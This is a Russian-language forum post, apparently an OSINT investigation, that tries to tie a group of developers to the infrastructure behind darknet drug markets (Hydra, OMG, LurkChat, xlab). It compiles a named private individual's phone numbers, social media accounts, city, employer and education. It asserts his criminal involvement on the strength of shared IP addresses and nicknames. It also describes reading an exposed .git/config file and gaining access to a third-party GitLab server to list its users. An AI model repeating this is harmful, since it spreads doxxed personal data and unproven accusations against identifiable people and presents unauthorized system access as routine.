В дружную, но не очень организованную группу Колеснева, входит также Александр Дырявин. О его вхождении в группу свидетельствуют 2 факта:пользователь GitLab на домене git.z.team: "id":40,"name":"Alexander Dyriavin","username":"dyriavin".

В github Дырявина разработки Колеснева (Askoldex).
Контактные данные Дырявина:[email protected]
https://www.linkedin.com/in/dyriavin/
https://github.com/AlexanderDyriavin
https://twitter.com/adyriavin
https://free-lance.ua/users/dyriavin/
Телефон +380636735773
телеграм @dyriavinПоиск по фото с git.z.team выдает максимальное соответствие с пользователем Вконтакте Alexander Dyriavin.vk.com/id409148919
Город: Чернигов
Место работы: SendPulse - email, SMS и мессенджер маркетинг
Сайт: http://miro-production.store
Моб. телефон: +380679856014
Instagram: idyriavin
Место работы: SendPulse - email, SMS и мессенджер маркетинг sendpulse.com/ru/
Образование Вуз: ЧНТУНа ip адресе 194.187.249.115 (вторая вставка countly счетчика на omg) находится сайт автопродаж pasaran.cc.Сайт автопродаж pasaran.cc.

Альтернативные домены магазина:
Зеркало сайта: pasaremos.net
TOR зеркало сайта: pasaranyq5ambvvh.onionС доменным именем pasaran.cc по данным доменного регистратора ассоциирован адрес электронной почты [email protected]Также на ip адресе 194.187.249.115 размещен сервис anopic.us.IP адреса, на которых размещен сервис anopic.us: 194.187.249.115, 83.220.170.34Сайт автопродаж: pasaran активно рекламит мессенджер LurkChat и рекламится внутри этого мессенджера, предлагая его как альтернативу Телеграм. Рассмотрим подробнее данный мессенджер.Результаты строгого поиска с указанием действующих ботов, созданных с целью распространения ПАВ.
Так, например бот URAL2.
Указан сайт xlab.tv, контакты внутри мессенджера. При изучении ресурса xlab.tv получены данные по домену, в частности адрес почты администратора домена [email protected], который ассоциирован с анонимным хостингом изображений anopic.us и сервисом одноразовых записок timenote.us.Связь с anopic.us и timenote.us.

Связь с xlab.tv.
В части ресурса xlab.tv, установлено, что на страницах имеется уникальный код, например функция: function getAreaListOfTheCity.

Поиск строгих совпадений по исходному коду дает следующий результат:
5 web pages in 0.00 s.
vd24.biz
legkrim.com
legvolga.com
xlab.uno
iskylab.netРесурс xlab.uno ассоциирован с адресом [email protected].Код: Domain Name: xlab.unoRegistry Domain ID: DB8BB90E2172840C28869BA2177B16084-NSRRegistrar WHOIS Server: whois.1api.netRegistrar URL: www.1api.netUpdated Date: 2018-04-28T06:45:38ZCreation Date: 2018-04-28T06:45:35ZRegistry Expiry Date: 2019-04-28T06:45:35ZRegistrar: 1API GmbHRegistrar IANA ID: 1387Registrar Abuse Contact Email: [email protected]Registrar Abuse Contact Phone: +49.68416984200Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibitedDomain Status: addPeriod https://icann.org/epp#addPeriodRegistry Registrant ID: CD2C98E6813414022A415A67717963BBC-NSRRegistrant Name: Jeck KrugerRegistrant Organization: Jeck KrugerRegistrant Street: Bezirk SchwyzRegistrant Street:Registrant Street:Registrant City: SchwyzRegistrant State/Province: SchwyzRegistrant Postal Code: 6430Registrant Country: SZRegistrant Phone: +41.36688958531Registrant Phone Ext:Registrant Fax: +41.36688958531Registrant Fax Ext:Registrant Email: [email protected]Registry Admin ID: CD2C98E6813414022A415A67717963BBC-NSRAdmin Name: Jeck KrugerAdmin Organization: Jeck KrugerAdmin Street: Bezirk SchwyzAdmin Street:Admin Street:Admin City: SchwyzAdmin State/Province: SchwyzAdmin Postal Code: 6430Admin Country: SZAdmin Phone: +41.36688958531Admin Phone Ext:Admin Fax: +41.36688958531Admin Fax Ext:Admin Email: [email protected]Registry Tech ID: CD2C98E6813414022A415A67717963BBC-NSRTech Name: Jeck KrugerTech Organization: Jeck KrugerTech Street: Bezirk SchwyzTech Street:Tech Street:Tech City: SchwyzTech State/Province: SchwyzTech Postal Code: 6430Tech Country: SZTech Phone: +41.36688958531Tech Phone Ext:Tech Fax: +41.36688958531Tech Fax Ext:Tech Email: [email protected]Name Server: david.ns.cloudflare.comName Server: chloe.ns.cloudflare.comDNSSEC: unsignedURL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/Доменные имена, ассоциированные с [email protected]:insculpo.net
insculpo.com
insculpo.info
insculpo.biz
sjob.infoРесурс insculpo.net продвигает обменник exactly.vip.
На ресурсе exactly.vip доступны файлы git, в том числе .git/config.Содержимое файла конфигурации:
Код: [core]repositoryformatversion = 0filemode = truebare = falselogallrefupdates = true[remote "origin"]url = http://jelink.net/olegdev/exactly.gitfetch = +refs/heads/*:refs/remotes/origin/*[branch "master"]remote = originmerge = refs/heads/masterНа домене jelink.net установлен git, получен доступ, установлены пользователи:
Код: "name":"Administrator","username":"BlackF234USON9la7s""name":"trigonastik","username":"trigonastik""name":"Ilonmaster","username":"Ilonmaster""name":"Galust","username":"galust""name":"olegdev","username":"olegdev""name":"Insculpo Dev","username":"insculpo""name":"Alex","username":"drthY""name":"GitLab Alert Bot","username":"alert-bot""name":"SadLary","username":"Sterling"LurkChat - он же fugweb ранее.

xjob.info и lurkchat.org на одном ip.

Интересно, кто пригласил xlab на форум legal - LoveGeneration (главный админ).

Еще странное совпадение. Hostname omg на одном сайте с хостингом картинок anopic. Второй ip очевидно неверно настроенный прокси (отдает только надпись "Домен работает !!!")

Одинаковые никнеймы в git-ах, общие ip сервисов, разработка инфраструктуры полного цикла для сбыта наркотиков от мессенджера до моментального магазина. Примем во внимание ошибку админов гидры, которую они к их чести очень быстро спрятали, но все же, а так же объем бизнеса xlab (оптовые продажи) и их влиятельные связи в «индустрии» - приглашение от Lovegen.В итоге: Группой разрабатывалось:социальная сеть (Insculpo)
месенджер (LurkChat)
финтех инструменты
системы агрегации магазинов запрещенных веществИз чего можно сделать вывод о том, что члены группы принимали участие в разработке/поддержке backend Гидры и возможно часть найденных мной систем должны были стать тем самым Eternos.Source: omg.expert
 
Сверху Снизу